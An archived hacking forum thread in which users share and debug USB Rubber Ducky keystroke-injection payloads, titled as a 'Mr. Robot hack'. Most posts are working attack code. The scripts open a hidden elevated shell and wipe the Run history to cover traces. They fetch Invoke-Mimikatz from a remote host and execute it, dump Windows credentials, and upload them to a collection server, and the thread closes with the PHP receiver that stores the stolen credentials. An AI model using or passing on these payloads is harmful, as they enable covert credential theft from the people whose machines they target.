Jump to content

Archived

This topic is now archived and is closed to further replies.

0x41414141

Mr. Robot Hack (optimized payload)

Recommended Posts

I've optimized the Mr. Robot hack to run faster (regardless of web server response times, latency, etc.) and more covertly.  Feel free to use the techniques with other payloads.

Once the FE (white/yellow) command prompt closes you can remove the rubber ducky and the script will continue to exfiltrate creds in the background.

 

DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
ENTER
DELAY 2000
ALT y
DELAY 1000
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://example.com/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('https://example.com/rx.php',$o)"&exit
ENTER

 

Share this post


Link to post
Share on other sites

You don't know how to make the script work without a web server by any chance do you? I'd like to get the information to save on the ducky itself.

Share this post


Link to post
Share on other sites
3 hours ago, Us3rnotfound said:

You don't know how to make the script work without a web server by any chance do you? I'd like to get the information to save on the ducky itself.

Do you already have a working version of c_duck_v2.1.hex?

Share this post


Link to post
Share on other sites
3 hours ago, 0x41414141 said:

Do you already have a working version of c_duck_v2.1.hex?

 Have the brand new device and the encoder program, that's about it.

Share this post


Link to post
Share on other sites
On 10/25/2016 at 7:44 AM, Us3rnotfound said:

 Have the brand new device and the encoder program, that's about it.

In that case you'll need to flash your firmware to a composite edition (i.e. c_duck_v2.1.hex) to function as a Twin Duck (both a USB drive and HID device).

Here is a hybrid script that will work on your current default firmware.  It will download the powershell script from a remote web server and save the mimikatz output to the local machine in the %temp% folder.

DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
ENTER
DELAY 2000
ALT y
DELAY 1000
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://paste.ee/r/Xopop');Invoke-Mimikatz -DumpCreds|Out-File '%temp%\mimikatz.txt';"&exit
ENTER

 

I'll follow up with another version for the Twin Duck firmware.

Share this post


Link to post
Share on other sites

Here's a version for the Twin Duck.  Make sure you leave the ducky plugged in long enough for the creds file to be written in the background.

DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
ENTER
DELAY 2000
ALT y
DELAY 1000
STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCK"') do @set duck=%d
ENTER
DELAY 500
STRING if exist %duck%\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\im.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\%computername%_creds.txt';"
ENTER

 

Share this post


Link to post
Share on other sites

do you have a link for the twinduck firmware?

also

doe the last script you wrote also contain the scripts to remove evidense?(powershell, CMD, and run command) because i want to try this out on my own computer

Share this post


Link to post
Share on other sites
1 hour ago, Bitbot17 said:

do you have a link for the twinduck firmware?

also

doe the last script you wrote also contain the scripts to remove evidense?(powershell, CMD, and run command) because i want to try this out on my own computer

Sure, I recommend you install Git to download all the relevant Rubber Ducky code.  Once you've installed Git, simply run the following command to clone everything:

git clone https://github.com/hak5darren/USB-Rubber-Ducky.git

From there, follow the instructions posted @ https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Flashing-ducky

The Twin Duck firmware is located in USB-Rubber-Ducky/Firmware/Images/ -- there are several versions but try c_duck_v2.1.hex

Yes, the last script also cleans up the evidence.  If you use the script, make sure you download Invoke-Mimikatz.ps1 and copy/rename it on your Twin Duck as im.ps1, you'll also need to modify the drive volume label to read DUCK

 

 

 

Share this post


Link to post
Share on other sites

Fantastic payload 0x41414141

I really like the run line that both opens an obfuscated CMD as well as removes all traces of the command. Might I make one alteration. On Windows 10 you'll receive the following error:

The screen cannot be set to the number of lines and columns specified.

This is because Windows 10 has a minimum command prompt column size of 18, unlike previous versions 14. So to cover most bases, I recommend:

STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"

Superb payload!
 

Share this post


Link to post
Share on other sites

Hey Guys,

 

Awesome .. ! After 3 hours and so much things learned, it's finally running properly !! :) (Twin duck)

Here the full payload, there's an ESC to close the autorun windows + set-executionpolicy remotesigned to allow running scripts on the system + ALT F4 at the end to close windows.

DELAY 3000
ESC
DELAY 500
GUI r
DELAY 1000
STRING powershell
DELAY 300
ENTER
DELAY 300
STRING set-executionpolicy remotesigned
DELAY 300
ENTER
DELAY 300
STRING o
DELAY 300
ENTER
DELAY 300
STRING exit
DELAY 300
ENTER
DELAY 500
GUI r
DELAY 300
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=40 cols=160&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
DELAY 500
ENTER
DELAY 1000
STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set DUCKY=%d
DELAY 300
ENTER
DELAY 1000
STRING if exist %DUCKY%\mimi.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %DUCKY%\mimi.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%DUCKY%\%computername%_creds.txt';"
DELAY 300
ENTER
DELAY 300
ALT F4   

Still, it needs 5-10 sec to writte the log file.

Something else : Here : https://ducktoolkit.com/encoder/

We need apparently to wipe out the cache of the browser or smth like that, cause when u encode, seems to encode the first payload you already encoded before .. (Am i clear :p ?) Or it's just a bad move from me.

 

Cheers guys

 

Share this post


Link to post
Share on other sites

@Darren Kitchen

can you update the link in your github tutorial for the usbrubber duckyfrom this link http://code.google.com/p/ducky-decode/source/browse/trunk/Flash/Duck%20Programming.zip to https://github.com/midnitesnake/USB-Rubber-Ducky/blob/master/Flash/Duck Programming.zip

it took me an hour to find the file.

 

and how do i put the payload on the ducky via windows?

Share this post


Link to post
Share on other sites
On 10/25/2016 at 9:39 PM, 0x41414141 said:

Here's a version for the Twin Duck.  Make sure you leave the ducky plugged in long enough for the creds file to be written in the background.


DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
ENTER
DELAY 2000
ALT y
DELAY 1000
STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCK"') do @set duck=%d
ENTER
DELAY 500
STRING if exist %duck%\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\im.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\%computername%_creds.txt';"
ENTER

so i have this made the payload and tried it on my machine, but i am receiving an error that says it could not find 'for' and   'xist' i am running windows 7 pro

 

Share this post


Link to post
Share on other sites

Good evening, I have been trying to get this (as well as the original script) to successfully work to no avail. When I manually run the powershell command, I receive the following error. Any ideas?

 

Exception calling "UploadString" with "2" argument(s): "The remote server retur
ned an error: (417) Expectation Failed."
At line:1 char:151
+ IEX(New-Object Net.WebClient).DownloadString('http://<my domain.com>/im.ps
1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString <<<<
('http://<my domain.com>/capture.php',$o)
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : DotNetMethodException

Share this post


Link to post
Share on other sites
3 hours ago, BrandonEckert said:

Good evening, I have been trying to get this (as well as the original script) to successfully work to no avail. When I manually run the powershell command, I receive the following error. Any ideas?

 

Exception calling "UploadString" with "2" argument(s): "The remote server retur
ned an error: (417) Expectation Failed."
At line:1 char:151
+ IEX(New-Object Net.WebClient).DownloadString('http://<my domain.com>/im.ps
1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString <<<<
('http://<my domain.com>/capture.php',$o)
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : DotNetMethodException

Is that the EXACT output from the console, or did you edit the URL for privacy before posting? If this is copied straight from your console, then the problem would be:

IEX(New-Object Net.WebClient).DownloadString('http://<my domain.com>/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://<my domain.com>/capture.php',$o)

You'd need to change the highlighted section to an actual domain which you wish to use.

I have a feeling you edited it like that on purpose, but it wouldn't be the first time I've seen someone copy/paste code and run it without noticing it needs to be modified to fit first.

Share this post


Link to post
Share on other sites
4 hours ago, BrandonEckert said:

Good evening, I have been trying to get this (as well as the original script) to successfully work to no avail. When I manually run the powershell command, I receive the following error. Any ideas?

 

Exception calling "UploadString" with "2" argument(s): "The remote server retur
ned an error: (417) Expectation Failed."
At line:1 char:151
+ IEX(New-Object Net.WebClient).DownloadString('http://<my domain.com>/im.ps
1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString <<<<
('http://<my domain.com>/capture.php',$o)
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : DotNetMethodException

If my above response wasn't helpful, try adding this line of code before the Net.WebClient line:

[System.Net.ServicePointManager]::Expect100Continue = $false

http://stackoverflow.com/questions/566437/http-post-returns-error-417-expectation-failed

Share this post


Link to post
Share on other sites

Sorry, yes I did redact my domain. I added that and now receive the following. Any ideas?:

 

o)"
Exception calling "UploadString" with "2" argument(s): "The remote server retur
ned an error: (406) Not Acceptable."
At line:1 char:151
+ IEX(New-Object Net.WebClient).DownloadString('http://<my domain>/im.ps
1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString <<<<
('http://<my domain>/capture.php',$o)
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : DotNetMethodException

Share this post


Link to post
Share on other sites

Just realized I had a typo, but the original error I had still exists. Below is the command I am running, as well as the Output:

 

C:\Windows\system32>powershell -NoP -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.199/im.ps1');$o=Invoke-Mimikatz -DumpCreds;[System.Net.ServicePointManager]::Expect100Continue = $false;(New-Object Net.WebClient).UploadString('http://10.0.0.199/capture.php',$o)"


Exception calling "UploadString" with "2" argument(s): "The remote server returned an error: (417) Expectation Failed."
At line:1 char:204
+ IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.199/im.ps1');$o=Invoke-Mimikatz -DumpCreds;[System.Net.ServicePointManager]::Expect100Continue =
$false;(New-Object Net.WebClient).UploadString <<<< ('http://10.0.0.199/capture.php',$o)
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : DotNetMethodException

Share this post


Link to post
Share on other sites
On 10/26/2016 at 3:39 AM, 0x41414141 said:

Here's a version for the Twin Duck.  Make sure you leave the ducky plugged in long enough for the creds file to be written in the background.


DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
ENTER
DELAY 2000
ALT y
DELAY 1000
STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCK"') do @set duck=%d
ENTER
DELAY 500
STRING if exist %duck%\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\im.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\%computername%_creds.txt';"
ENTER

 

I ran it together with the correct im.ps1 on a Windows 10 machine(yes my usb is named 'DUCK'). Commands ran properly until the last STRING I think then the powershell session just did nothing and hanged on the last string. A file was never created so I am assuming mimikatz didn't even run. Could it be the case sensivity in ' do @set duck=%d' and %duck%? I have the feeling the last IF isn't executed because it is returned False.

Share this post


Link to post
Share on other sites
On 12/7/2016 at 3:54 PM, BrandonEckert said:

Just realized I had a typo, but the original error I had still exists. Below is the command I am running, as well as the Output:

 

C:\Windows\system32>powershell -NoP -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.199/im.ps1');$o=Invoke-Mimikatz -DumpCreds;[System.Net.ServicePointManager]::Expect100Continue = $false;(New-Object Net.WebClient).UploadString('http://10.0.0.199/capture.php',$o)"


Exception calling "UploadString" with "2" argument(s): "The remote server returned an error: (417) Expectation Failed."
At line:1 char:204
+ IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.199/im.ps1');$o=Invoke-Mimikatz -DumpCreds;[System.Net.ServicePointManager]::Expect100Continue =
$false;(New-Object Net.WebClient).UploadString <<<< ('http://10.0.0.199/capture.php',$o)
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : DotNetMethodException

i was having the same problem. definitely spent quite a bit of time on the interwebs trying to figure this particular bitch out. turns out it has something to do with HTML1.0 vs 1.1 and how it relates to the "Expect and 100 (Continue)" component:

http://www8.org/w8-papers/5c-protocols/key/key.html

Quote

Expect and 100 (Continue)

Some HTTP requests (for example, the PUT or POST methods) carry request bodies, which may be arbitrarily long. If, the server is not willing to accept the request, perhaps because of an authentication failure, it would be a waste of bandwidth to transmit such a large request body.

HTTP/1.1 includes a new status code, 100 (Continue), to inform the client that the request body should be transmitted. When this mechanism is used, the client first sends its request headers, then waits for a response. If the response is an error code, such as 401 (Unauthorized), indicating that the server does not need to read the request body, the request is terminated. If the response is 100 (Continue), the client can then send the request body, knowing that the server will accept it.

However, HTTP/1.0 clients do not understand the 100 (Continue) response. Therefore, in order to trigger the use of this mechanism, the client sends the new Expect header, with a value of 100-continue. (The Expect header could be used for other, future purposes not defined in HTTP/1.1.)

Because not all servers use this mechanism (the Expect header is a relatively late addition to HTTP/1.1, and early ``HTTP/1.1'' servers did not implement it), the client must not wait indefinitely for a 100 (Continue) response before sending its request body. HTTP/1.1 specifies a number of somewhat complex rules to avoid either infinite waits or wasted bandwidth. We lack sufficient experience based on deployed implementations to know if this design will work efficiently.

while someone provided the solution, the trick is that it has to be the first command in the line. current working theory is that after PS loads net.webclient, you are no longer able to alter the configuration it's already running as for the remainder of the session. if you, on the other hand, change the setting before any net.webclient components are loaded in the session, subsequent net.webclient instances launched for the remainder of the session will pull from this configuration.

below is how i finally got the code to work without throwing any errors on the PS side.

[System.Net.ServicePointManager]::Expect100Continue = $false ; IEX (New-Object Net.WebClient).DownloadString('http://ADDRESS/im.ps1') ; $output = Invoke-Mimikatz -DumpCreds ; (New-Object Net.WebClient).UploadString('http://ADDRESS/rx.php' , $output )

then i banged my head against the table for a good 24 hours trying to figure out why the server/rx.php script wasn't creating the .creds file. a good night's sleep and a clear head did the trick.

Share this post


Link to post
Share on other sites

I have a quick little problem. The code and everything runs perfectly fine. My problem is that when the uac prompt comes up, it comes up as an non-active window. So, when alt+y is being pressed its not being pressed in the uac prompt window. Is there any way to fix this issue/workaround?

Amazing twin duck payload!

Thanks.

Share this post


Link to post
Share on other sites
On 2/5/2017 at 2:39 AM, MrMoi said:

Hi @0x41414141

Can you please show us the source code of your file "rx.php" ?

 

thank you

 

Here you go.

<?php
$file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
file_put_contents($file, file_get_contents("php://input"));
?>

 

Share this post


Link to post
Share on other sites

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...